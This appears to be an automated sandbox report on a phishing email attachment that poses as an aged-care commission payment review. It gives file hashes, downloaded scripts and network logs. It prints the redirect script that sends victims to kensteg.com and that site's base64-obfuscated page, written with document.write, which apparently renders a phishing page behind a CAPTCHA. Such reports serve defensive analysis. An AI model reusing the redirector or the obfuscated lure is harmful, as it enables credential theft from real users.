                                                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X*.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1.d......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 24 02:01:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2677
                                                                    Entropy (8bit):4.001732890258126
                                                                    Encrypted:false
                                                                    SSDEEP:48:8kdFTNloHVidAKZdA1TehDiZUkwqehpy+R:8+/DDy
                                                                    MD5:EAE8309E37EC667FC22DEEB668BAA3F6
                                                                    SHA1:B162E1DE08280C037DCA7DA7B4390B56F49D2FDA
                                                                    SHA-256:AF29EC033D2D6E7FFF8FCFEE245298F2F699E992F2CD2C88144CBED6562D775B
                                                                    SHA-512:C52CDE64AC726E1B2C81B4BA0B3247AF51D0FAA875C68CB6F2CEB1891F8D50176355D9236C64C37824DA558583982738934CD5E11D7BB9EE2EEEA054AB690835
                                                                    Malicious:false
                                                                    Preview:L..................F.@.. ...$+.,....z97.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X*.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X;............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1.d......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 24 02:01:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2677
                                                                    Entropy (8bit):3.9878951723987157
                                                                    Encrypted:false
                                                                    SSDEEP:48:8hdFTNloHVidAKZdA1dehBiZUk1W1qeh/y+C:8p/z9fy
                                                                    MD5:9930E9027B1EBE9F1CBEAFB3A8DD7801
                                                                    SHA1:37508930205578420BFEC5DCF1C21B8371551A1B
                                                                    SHA-256:307D457230F9ED31F0A3F1113174B85553F7C74201564AB4FFDF477845BE0E37
                                                                    SHA-512:A799D107D0AC3E5024367C81F628E2891DE590A4F2322CBDDB3ED893A78669026CDDAC77AF68C2218F1A683F47F90D9449A15017A2CCB7C415F0BDC4AF0F3F7D
                                                                    Malicious:false
                                                                    Preview:L..................F.@.. ...$+.,....f.C.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X*.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X;............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1.d......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 24 02:01:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2679
                                                                    Entropy (8bit):3.999646754753317
                                                                    Encrypted:false
                                                                    SSDEEP:48:8SdFTNloHVidAKZdA1duTeehOuTbbiZUk5OjqehOuTbBy+yT+:8A/XTfTbxWOvTbBy7T
                                                                    MD5:A819D0F7CD724AE3A5AE6D93A1F3CD46
                                                                    SHA1:204A047C8B848D691911E65333A9C1C658FBDFE0
                                                                    SHA-256:3CC08A0058C4FDE62E1ACCF64BC0E6AE90D1E8BD5A3419F42DD9C1F4A57D7868
                                                                    SHA-512:34012D284337191CE1F135F989380B7A3AC7E14D62D5BCC1092881718D7E2F0A3E11FA111D512E75B1DAF8D73F1F328CDCF90B284770A84D7CD1F7A75E516BC0
                                                                    Malicious:false
                                                                    Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X*.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X;............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1.d......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65447)
                                                                    Category:downloaded
                                                                    Size (bytes):89501
                                                                    Entropy (8bit):5.289893677458563
                                                                    Encrypted:false
                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                    Malicious:false
                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 76 x 95, 8-bit/color RGB, non-interlaced
                                                                    Category:downloaded
                                                                    Size (bytes):61
                                                                    Entropy (8bit):4.014960565232003
                                                                    Encrypted:false
                                                                    SSDEEP:3:yionv//thPlRgt/2/l/xl/k4E08up:6v/lhP8tO17Tp
                                                                    MD5:68520001D3F7CD77C1F0325308DA9B8A
                                                                    SHA1:9468031734CC25887ABC46C552A0D4C391C271F5
                                                                    SHA-256:AD6ED41475F00361628D1D7298251EB3CE6034A24A1864B9C05F225E8A32D152
                                                                    SHA-512:74C7D6EE28F83E72A4706049F46290C4B7EF9D86BFB82D18E39AEF1D8BD32ADC8198EC5EAADE5FC468ED32B835C87EBFE4499470E3760255CAA94ADA56F48BB8
                                                                    Malicious:false
                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/888a0b630ed98c1b/1716519723558/wlYn9sv82zuVieG
                                                                    Preview:.PNG........IHDR...L..._.......I....IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 76 x 95, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):61
                                                                    Entropy (8bit):4.014960565232003
                                                                    Encrypted:false
                                                                    SSDEEP:3:yionv//thPlRgt/2/l/xl/k4E08up:6v/lhP8tO17Tp
                                                                    MD5:68520001D3F7CD77C1F0325308DA9B8A
                                                                    SHA1:9468031734CC25887ABC46C552A0D4C391C271F5
                                                                    SHA-256:AD6ED41475F00361628D1D7298251EB3CE6034A24A1864B9C05F225E8A32D152
                                                                    SHA-512:74C7D6EE28F83E72A4706049F46290C4B7EF9D86BFB82D18E39AEF1D8BD32ADC8198EC5EAADE5FC468ED32B835C87EBFE4499470E3760255CAA94ADA56F48BB8
                                                                    Malicious:false
                                                                    Preview:.PNG........IHDR...L..._.......I....IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):227
                                                                    Entropy (8bit):5.017039939462366
                                                                    Encrypted:false
                                                                    SSDEEP:6:qF/xDWuPxm9/UAY8PXIfmFriNVEpkdBkd4NGh:sWuZY/Ur8PXIfQriNVEbd4NGh
                                                                    MD5:7F4AEC285360BA6EC139352A3D0B9595
                                                                    SHA1:4E375F3E46CE77836BE035BAD5DFE828107F299D
                                                                    SHA-256:246A5EA1A2E698CFEAB6F4C1B384D31BC6B8C0E2FAF3F56FB2ADC7CB2D638D6C
                                                                    SHA-512:6A1E80ED522FC0CB2CC4D258237E04B8BF07C5D945278D6764E9628F353DECCBFA8B3E2FD34B96D67B4FCE7498ABC469140405C87F2B362EFBDA80F66863F915
                                                                    Malicious:false
                                                                    URL:https://cloudbyteit.co.za/play/
                                                                    Preview:<html>. <body></body>. <script>. var u = window.location.href.lastIndexOf("/") + 1;. var d = window.location.href.substring(u);. window.location.replace("https://ZtYw.kensteg.com/82jPIO/#D" + d);. </script>.</html>
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (42526)
                                                                    Category:downloaded
                                                                    Size (bytes):42527
                                                                    Entropy (8bit):5.373234803143812
                                                                    Encrypted:false
                                                                    SSDEEP:768:NCoLEBOnQowmmxCsbE95NdDid29P4DY88fvO959F1DQ+aohLyKoS4Hnla5KX5:qWQowHxCsQ919P0959vk
                                                                    MD5:C667700BE084108F8DEDED9026FFBBF9
                                                                    SHA1:31D633A11EF13A66787EC6504E38C11842664B7B
                                                                    SHA-256:E158035A6F740B0245A027BF0D559C56782EBBEEC7CAB5A827083BD16AA47901
                                                                    SHA-512:9EEA0C81A4D7E7ED7EE7F30A53B5AA93C356129D9850AE978A6D408F0B1337F3E9FCEDE25C996DCA3A2AC9840B86B4D821CD0A9DFFCF8BC427A730F420F33891
                                                                    Malicious:false
                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js
                                                                    Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(s){r(s);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function dr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):61
                                                                    Entropy (8bit):3.990210155325004
                                                                    Encrypted:false
                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                    Malicious:false
                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                    Category:downloaded
                                                                    Size (bytes):61
                                                                    Entropy (8bit):3.990210155325004
                                                                    Encrypted:false
                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                    Malicious:false
                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (5154), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):5154
                                                                    Entropy (8bit):5.761495062456314
                                                                    Encrypted:false
                                                                    SSDEEP:96:EjcbAkrVlmMoYevo6T1aN/oOucBNXPpayjoHFL5vfAZam0F:EIL56o06/oUTEOorvf8O
                                                                    MD5:9E11C21F9EBBD97A08F487387120B53B
                                                                    SHA1:D57976B43048E9DFB475808D7A16FD7380324728
                                                                    SHA-256:5E897E0BF25A897AC60AF57E98F3CC722AF4C7731BA9FE58C1270D99E2EB6CC2
                                                                    SHA-512:51D235E30ACBA8FAD8DB67758E1E1D8301598CF3C8FBCC216179FCAB5F70A322917FE023F61544D9106DBDAEEEE12D43AB6E1A444A4C18EF518A06E417415402
                                                                    Malicious:false
                                                                    URL:https://ztyw.kensteg.com/82jPIO/
                                                                    Preview:<script>document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPk5PdlB1bG1iMDc8L3RpdGxlPg0KICAgIDxzdHlsZT4NCmJvZHkgew0KICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICBoZWlnaHQ6IDEwMCU7DQogIG92ZXJmbG93OiBoaWRkZW47DQp9DQojQ25JUkxsb3JjWCBoNHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbTouNXJlbTtmb250LXdlaWdodDo1MDA7bGluZS1oZWlnaHQ6MS4yO30NCiNDbklSTGxvcmNYIGg0e2ZvbnQtc2l6ZTpjYWxjKDEuMyk7fQ0KQG1lZGlhIChtaW4td2lkdGg6MTIwMHB4KXsNCiNDbklSTGxvcmNYIGg0e2ZvbnQtc2l6ZToxLjVyZW07fQ0KfQ0KI0NuSVJMbG9yY1ggcHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbToxcmVtO30NCiNDb
                                                                    File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                    Entropy (8bit):7.990092247733616
                                                                    TrID:
                                                                    • ZIP compressed archive (8000/1) 100.00%
                                                                    File name:attach_request_478000006439785.zip
                                                                    File size:21'280 bytes
                                                                    MD5:1a4840954efb2ca69ef76b13b84bc28d
                                                                    SHA1:2ad17c46395439bb22cd5e5aa6fb4c71cea2ddf4
                                                                    SHA256:911ad9a6db8c1c6bfe00516dcdb045163c39f16e8caa08e1f494f0a550fa23d5
                                                                    SHA512:e548e9f0a25e0455eae6cbdafdce9c927373f739fe6614e7bafb57c724f432f9c1c2b424992e4b62e236de0ecd468e9700eab800622b82fec2664db8a9a585f5
                                                                    SSDEEP:384:Vb3OSEEZNj/x6vTWtvle73jjwCxvXtwjhCOFxSM7hgU31+E/dkDweIV+:Vb/v/QvTsszjwCwjhCuSCh0E/dkDwej
                                                                    TLSH:D6A2D1830C75A0469558D921E1F89C380B2BFD21C39D2568C16DEA13767B4BAFED6ECC
                                                                    File Content Preview:PK.........g.X............@...Aged Care Quality And Safety Commission_Payment Review#0772-.pdf...X.....!.-@p...:3...w.....5@.\C..............._.Y....y...33.]].R..US..P...0..Y...f.T......I.....@{....I..P..j.....c.c.c.c.c......1.1...0.0..a@..l..r.P..}.?D...
                                                                    Icon Hash:1c1c1e4e4ececedc
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 24, 2024 05:01:42.962177992 CEST49673443192.168.2.16204.79.197.203
                                                                    May 24, 2024 05:01:43.264705896 CEST49673443192.168.2.16204.79.197.203
                                                                    May 24, 2024 05:01:43.870517969 CEST49673443192.168.2.16204.79.197.203
                                                                    May 24, 2024 05:01:45.078556061 CEST49673443192.168.2.16204.79.197.203
                                                                    May 24, 2024 05:01:45.594022036 CEST49688443192.168.2.162.23.209.133
                                                                    May 24, 2024 05:01:47.356312990 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:47.356360912 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:47.356625080 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:47.358530045 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:47.358608961 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:47.489602089 CEST49673443192.168.2.16204.79.197.203
                                                                    May 24, 2024 05:01:48.155385971 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.155533075 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.159431934 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.159451962 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.159862041 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.208482027 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.220278978 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.266499996 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.516877890 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.516938925 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.516963005 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.517002106 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.517030001 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.517045021 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.517087936 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.517126083 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.517126083 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.517158985 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.529311895 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.529427052 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.529448032 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.529499054 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.529583931 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.531404972 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.531444073 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:48.531471014 CEST49703443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:01:48.531486988 CEST4434970340.127.169.103192.168.2.16
                                                                    May 24, 2024 05:01:49.389333010 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:49.389372110 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:49.389503956 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:49.390790939 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:49.390810013 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.043039083 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.043171883 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.046137094 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.046155930 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.046432018 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.090517998 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.093446016 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.138525963 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.338078976 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.338252068 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.338279009 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.338313103 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.338327885 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.338327885 CEST49704443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.338337898 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.338345051 CEST44349704184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.406606913 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.406636953 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:50.406721115 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.407141924 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:50.407156944 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.065385103 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.065471888 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:51.066468954 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:51.066476107 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.066802025 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.067755938 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:51.114494085 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.127849102 CEST49678443192.168.2.1620.189.173.10
                                                                    May 24, 2024 05:01:51.352461100 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.352638006 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.352685928 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:51.353884935 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:51.353904963 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.353919983 CEST49705443192.168.2.16184.28.90.27
                                                                    May 24, 2024 05:01:51.353925943 CEST44349705184.28.90.27192.168.2.16
                                                                    May 24, 2024 05:01:51.429541111 CEST49678443192.168.2.1620.189.173.10
                                                                    May 24, 2024 05:01:52.033510923 CEST49678443192.168.2.1620.189.173.10
                                                                    May 24, 2024 05:01:52.303631067 CEST49673443192.168.2.16204.79.197.203
                                                                    May 24, 2024 05:01:53.241518021 CEST49678443192.168.2.1620.189.173.10
                                                                    May 24, 2024 05:01:54.941592932 CEST49712443192.168.2.1641.185.8.68
                                                                    May 24, 2024 05:01:54.941636086 CEST4434971241.185.8.68192.168.2.16
                                                                    May 24, 2024 05:01:54.941696882 CEST49712443192.168.2.1641.185.8.68
                                                                    May 24, 2024 05:01:54.941932917 CEST49712443192.168.2.1641.185.8.68
                                                                    May 24, 2024 05:01:54.941976070 CEST4434971241.185.8.68192.168.2.16
                                                                    May 24, 2024 05:01:55.594736099 CEST4968080192.168.2.16192.229.211.108
                                                                    May 24, 2024 05:01:55.642519951 CEST49678443192.168.2.1620.189.173.10
                                                                    May 24, 2024 05:01:55.897578001 CEST4968080192.168.2.16192.229.211.108
                                                                    May 24, 2024 05:01:55.918221951 CEST4434971241.185.8.68192.168.2.16
